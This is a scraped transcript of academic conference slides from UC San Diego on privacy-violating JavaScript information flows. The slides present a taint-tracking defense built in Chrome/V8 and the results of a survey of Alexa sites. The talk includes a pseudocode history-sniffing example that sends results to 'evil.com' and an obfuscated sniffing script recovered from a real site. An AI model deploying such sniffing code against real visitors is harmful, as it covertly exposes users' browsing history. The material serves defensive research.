document.location ✗ location hijacking phishing

58
An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham UC San Diego

Upload: francine-rogers

Post on 16-Jan-2016

226 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: document.location ✗ Location Hijacking Phishing

An Empirical Study ofPrivacy-Violating Information Flows

In JavaScript Web Applications

Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham

UC San Diego

Page 2: document.location ✗ Location Hijacking Phishing
Page 3: document.location ✗ Location Hijacking Phishing

document.location

✗ Location HijackingPhishing

Page 4: document.location ✗ Location Hijacking Phishing
Page 5: document.location ✗ Location Hijacking Phishing

document.cookie

Identity Theft✗ Cookie Stealing

Page 6: document.location ✗ Location Hijacking Phishing
Page 7: document.location ✗ Location Hijacking Phishing

✗ History Sniffing

JavaScriptVisited

Not-Visited

Page 8: document.location ✗ Location Hijacking Phishing
Page 9: document.location ✗ Location Hijacking Phishing

See absolutely everything visitors do on your webpage. …

Page 10: document.location ✗ Location Hijacking Phishing

Behavior Tracking✗

Page 11: document.location ✗ Location Hijacking Phishing

Plenty of Mischief Possible!

Page 12: document.location ✗ Location Hijacking Phishing

How Prevalent Are Malicious Flows?

How to Detect Malicious Flows?

Page 13: document.location ✗ Location Hijacking Phishing

MotivationFlow Policies

Dynamic Flow TrackingFlows in the Wild

Conclusions

Page 14: document.location ✗ Location Hijacking Phishing

Flow Policies

Specify different types of flows

Page 15: document.location ✗ Location Hijacking Phishing

Policies:History Sniffing

1. Create (invisible) link to a.com color depends on history

2. Inspect link’s color style property color says if link was visited

3. Send sniffed info over network

Page 16: document.location ✗ Location Hijacking Phishing

Policies:History Sniffing link = createLink(“facebook.com”); style = doc.getStyle(link);

visited = style.color==“purple”;

send(“evil.com”,“facebook=” + visited);

Page 17: document.location ✗ Location Hijacking Phishing

Policies:History Sniffing

Inject Taints(At confidential sources)

link = createLink(“facebook.com”); style = doc.getStyle(link);

visited = style.color==“purple”;

send(“evil.com”,“facebook=” + visited);

doc.getStyle(link);

Page 18: document.location ✗ Location Hijacking Phishing

Policies:History Sniffing

Propagate Taints(At assignments, etc.)

link = createLink(“facebook.com”); style = doc.getStyle(link);

visited = style.color==“purple”;

send(“evil.com”,“facebook=” + visited);

doc.getStyle(link);

send(“evil.com”,“facebook=” + visited);

style

visited style.color==“purple”style.color==“purple”;

Page 19: document.location ✗ Location Hijacking Phishing

link = createLink(“facebook.com”); style = doc.getStyle(link);

visited = style.color==“purple”;

send(“evil.com”,“facebook=” + visited); “cr=” +

color

Policies:History Sniffing

Block Taints(At untrusted sinks)

send(“evil.com”,“facebook=” + visited);

Page 20: document.location ✗ Location Hijacking Phishing

Flow Policies

Inject Block

Page 21: document.location ✗ Location Hijacking Phishing

Flow Policies

at doc.getStyle($1) if isLink($1)inject “secret”

Taint style with “secret”

Inject Block

Page 22: document.location ✗ Location Hijacking Phishing

Flow Policies

Inject Block

Page 23: document.location ✗ Location Hijacking Phishing

Flow Policies

at send($1, $2)block “secret” on $2

Block tainted values to third-party

Inject Block

Page 24: document.location ✗ Location Hijacking Phishing

Flow Policies

Inject Blockat Site if Cond inject Taint

at Site block Taint on Param

Page 25: document.location ✗ Location Hijacking Phishing

Flow Policies

ExpressiveHistory Sniffing

Behavior TrackingCookie Stealing

Location Hijacking…

Page 26: document.location ✗ Location Hijacking Phishing

MotivationFlow Policies

Dynamic Flow TrackingFlows in the Wild

Conclusions

Page 27: document.location ✗ Location Hijacking Phishing

Dynamic Flow TrackingRewrite JS code to carry taints

Parse ExecuteSourcecode AST Rewrite AST

Dynamic Eval

[Chander et al POPL 07]

Page 28: document.location ✗ Location Hijacking Phishing

Add .taint fields

Parse ExecuteSourcecode AST Rewrite AST

Dynamic Eval

Inject, Propagate, Block Taints

Rewritten Code

Page 29: document.location ✗ Location Hijacking Phishing

Rewriting Issues

Parse ExecuteSourcecode AST Rewrite AST

Boxing / UnboxingIndirect Flows

Dynamic Eval

Page 30: document.location ✗ Location Hijacking Phishing

Rewriting Issues

Parse ExecuteSourcecode AST Rewrite AST

Boxing / UnboxingIndirect Flows

Dynamic Eval

Page 31: document.location ✗ Location Hijacking Phishing

Dynamic Flow TrackingRewrite JS code to carry taints

Parse ExecuteSourcecode AST Rewrite AST

Dynamic Eval

Implemented in Chrome/V8

Page 32: document.location ✗ Location Hijacking Phishing

Dynamic Flow TrackingPerformance (Overhead)

Page 33: document.location ✗ Location Hijacking Phishing

Performance: Policies

Cookie Confidentialitycookie doesn’t flow to 3rd party

codeLocation Integrity

location unaffected by 3rd party code

Page 34: document.location ✗ Location Hijacking Phishing

Performance: Benchmark

10 sites with the largest JS code base in Alexa top 100

15 – 31 Kloc (avg. 21Kloc)

Page 35: document.location ✗ Location Hijacking Phishing

Performance: Figures

Timing OverheadsPage load (avg: 2x) JS execution (avg: 3x)

Page 36: document.location ✗ Location Hijacking Phishing

Performance: Upshot

High for online useAcceptable for offline survey

Page 37: document.location ✗ Location Hijacking Phishing

MotivationFlow Policies

Dynamic Flow TrackingFlows in the Wild

Conclusions

Page 38: document.location ✗ Location Hijacking Phishing

Flows “In the Wild”

History Sniffing

Behavior Tracking

Page 39: document.location ✗ Location Hijacking Phishing

History Sniffing: Figures

Alexa Top 50,000 sites

63 sites reported as sending history over network

1 site in Alexa Top 100

46 sites were real cases

Page 40: document.location ✗ Location Hijacking Phishing

var k = {0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn“...};var g = [];for (var m in k) { var d = k[m]; var a = ""; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { "http://":"", "http://www.":""}) { var l = document.createElement("a"); l.href = j + a; document.getElementById("ol").appendChild(l); var e = document.getComputedStyle(l).getPropertyValue("color") if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } } if (h) { g.push(m) }}

Encrypted URLs

Decrypt URLCreate Link

Inspect Color

History Sniffing: Example

1 site in Alexa Top 100

Page 41: document.location ✗ Location Hijacking Phishing

History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46

+ 36 more cases…

Page 42: document.location ✗ Location Hijacking Phishing

History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46

+ 36 more cases…

Page 43: document.location ✗ Location Hijacking Phishing

History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46

+ 36 more cases…

Page 44: document.location ✗ Location Hijacking Phishing

History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46

+ 36 more cases…

doubleclick.net

charter.net doubleclick.net interclick

Page 45: document.location ✗ Location Hijacking Phishing

History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46

+ 36 more cases…

gamestorrents harrenmedianetwork meaningtool

Page 46: document.location ✗ Location Hijacking Phishing

History Sniffing: Upshot

# of sniffed URLs: 8 to 22246 of real cases

39 had third-party sniffing code7 had home-grown code

Obfuscated sniffing codeCode was generated at runtime

Page 47: document.location ✗ Location Hijacking Phishing

Malicious Flows “In the Wild”

History Hijacking

Behavior Tracking

Page 48: document.location ✗ Location Hijacking Phishing

Behavior Tracking

Log user behavior by JS event handlers

Send log back to website

Page 49: document.location ✗ Location Hijacking Phishing

Behavior Tracking: Policywhile(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}onMouseOver = function(event) isMouseOver = true;}

true

Page 50: document.location ✗ Location Hijacking Phishing

Behavior Tracking: Policy

at $1.isMouseOver() inject “secret”at $1.isClick() inject “secret”…

while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}

e.isMouseOver()

Page 51: document.location ✗ Location Hijacking Phishing

Behavior Tracking: Figures

Alexa Top 1300 sites328 sites sent behavior115 sites sent behavior covertly10 sampled for manual inspection7 manually reconstructed flow

Automatically trigger JS event handlersMany user-visible (image swapping)

Covert Filter: response < 100 bytes

Page 52: document.location ✗ Location Hijacking Phishing

Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click

Page 53: document.location ✗ Location Hijacking Phishing

Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click

Page 54: document.location ✗ Location Hijacking Phishing

Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click

webtrends.com

Page 55: document.location ✗ Location Hijacking Phishing

MotivationFlow Policies

Dynamic Flow TrackingFlows in the Wild

Conclusions

Page 56: document.location ✗ Location Hijacking Phishing

ConclusionsFlows Occur In The WildReal cases for further study

Dynamic Approach is RequiredObfuscated & dynamically generated

Page 57: document.location ✗ Location Hijacking Phishing

Future workLarger Scale Study on Flows

Deeper crawl & other types of flow

Bullet-proof Protection ToolPolicy enforcement without

much slowdown & many false-alarms

Page 58: document.location ✗ Location Hijacking Phishing

Thank you!